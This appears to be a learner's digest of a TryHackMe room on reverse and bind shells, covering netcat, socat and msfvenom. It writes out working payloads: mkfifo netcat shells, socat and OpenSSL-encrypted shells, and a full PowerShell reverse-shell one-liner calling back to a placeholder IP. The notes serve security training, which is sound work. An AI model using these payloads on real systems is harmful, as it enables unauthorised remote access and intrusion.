What the Shell?

An introduction to sending and receiving (reverse/bind) shells when exploiting target machines.

This walkthrough from tryHackMe describes some technique about getting the shell. Here I not only share the answer but this is also a 'digest' type note from that room. This will help to quickly view those techniques.

Task 2: Tools

Useful tools for shell:

  • Netcat

  • Socat

  • Metasploit - multi/handler: auxiliary/multi/handler used to receive reverse shells

  • msfvenom

Task 3: Types of shell

  1. Reverse shells are when the target is forced to execute code that connects back to your computer.

  2. Bind shells are when the code executed on the target is used to start a listener attached to a shell directly on the target.

Shells can be either interactive or non-interactive.

Task 4: Netcat

Netcat is the most basic tool in a pentester's toolkit when it comes to any kind of networking.

  1. Reverse shell : nc -lvnp <port-number>

  2. Bind shell: nc <target-ip> <chosen-port>

-lvnp means

  • -l is used to tell netcat that this will be a listener

  • -v is used to request a verbose output

  • -n tells netcat not to resolve host names or use DNS. Explaining this is outwith the scope of the room.

  • -p indicates that the port specification will follow.

Task 5: Netcat shell stabilization

There are many ways to stabilize netcat shells on Linux systems.

  • Technique 1: Python

    • To spawn a better featured bash shell: python -c 'import pty;pty.spawn("/bin/bash")'

    • Some targets may need the version of Python specified.

    • export TERM=xterm - this will give us access to term commands such as clear

    • Finally, in our own terminal we use stty raw -echo; fg

      • it turns off our own terminal echo

      • it foregrounds the shell

  • Technique 2: rlwrap

    • This technique is particularly useful when dealing with Windows shells

    • Listener command: rlwrap nc -lvnp <port>

  • Technique 3: socat

    • this technique is limited to Linux targets

Task 6: Socat

A very good article on socat : Read here

Reverse shell :

  • Basic syntax: socat TCP-L:<port> - this is similar to nc -lvnp <port>

  • Command to connect back

    • Windows: socat TCP:<LOCAL-IP>:<LOCAL-PORT> EXEC:powershell.exe,pipes

    • Linux: socat TCP:<LOCAL-IP>:<LOCAL-PORT> EXEC:"bash -li"

Bind shell:

  • Command to connect

    • Windows: socat TCP-L:<PORT> EXEC:powershell.exe,pipes

    • Linux: socat TCP-L:<PORT> EXEC:"bash -li"

    • Command on our attacking machine to connect to the waiting listener: socat TCP:<TARGET-IP>:<TARGET-PORT> -

    • A more stable and Linux only command: socat TCP-L:<port> FILE:`tty`,raw,echo=0

Task 7: socat encrypted shell

Getting an encrypted reverse shell:

  • First, generate certificate: openssl req --newkey rsa:2048 -nodes -keyout shell.key -x509 -days 362 -out shell.crt

  • The command above creates a 2048-bit RSA key with a matching cert file - valid for 1 year

  • Now, merge two created files into one: cat shell.key shell.crt > shell.pem

  • Reverse shell listener on attacker machine: socat OPENSSL-LISTEN:<PORT>,cert=shell.pem,verify=0 -

  • Execute command on victim machine: socat OPENSSL:<LOCAL-IP>:<LOCAL-PORT>,verify=0 EXEC:/bin/bash

Getting an encrypted bind shell:

  • Run in Target machine: socat OPENSSL-LISTEN:<PORT>,cert=shell.pem,verify=0 EXEC:cmd.exe,pipes

  • Attacker machine: socat OPENSSL:<TARGET-IP>:<TARGET-PORT>,verify=0 -

Note: Even for windows target, use certificate with listener.

Task 8: Common shell payloads

In recent updates, -e /bin/shell option don't work as it is insecure. So we need to use a special command to execute shell.

  • To create a bind shell:

    • In the Target machine: mkfifo /tmp/f; nc -lvnp <PORT> < /tmp/f | /bin/sh >/tmp/f 2>&1; rm /tmp/f

    • Attacker machine: nc -lvnp <PORT>

  • For a reverse shell:

    • In the Target machine: mkfifo /tmp/f; nc <LOCAL-IP> <PORT> < /tmp/f | /bin/sh >/tmp/f 2>&1; rm /tmp/f

A detail explanation about the command can be found here: Link

A standard one liner PowerShell reverse shell code below. We need to replace '<ip>' and <port> here.

powershell -c "$client = New-Object System.Net.Sockets.TCPClient('<ip>',<port>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

Reverse shell cheat sheet list: Payloads All The Things

Task 9: msfvenom

The standard syntax for msfvenom: msfvenom -p <PAYLOAD> <OPTIONS>

There are 2 type of reverse shell payloads:

  1. Staged: This payload has 2 parts

    1. Stager: This goes to the server and initiate a reverse connection only. It has no payload in it

    2. Reverse shell code: This bulk code is downloaded after an initial connection.

  2. Stageless: The whole reverse shell code gets uploaded to a server for a connection back. These are easy to detect by detection software.

A very good cheat sheet about msfvenom: Link here

PreviousNetwork services 2NextCommon Linux Privesc

Last updated

Was this helpful?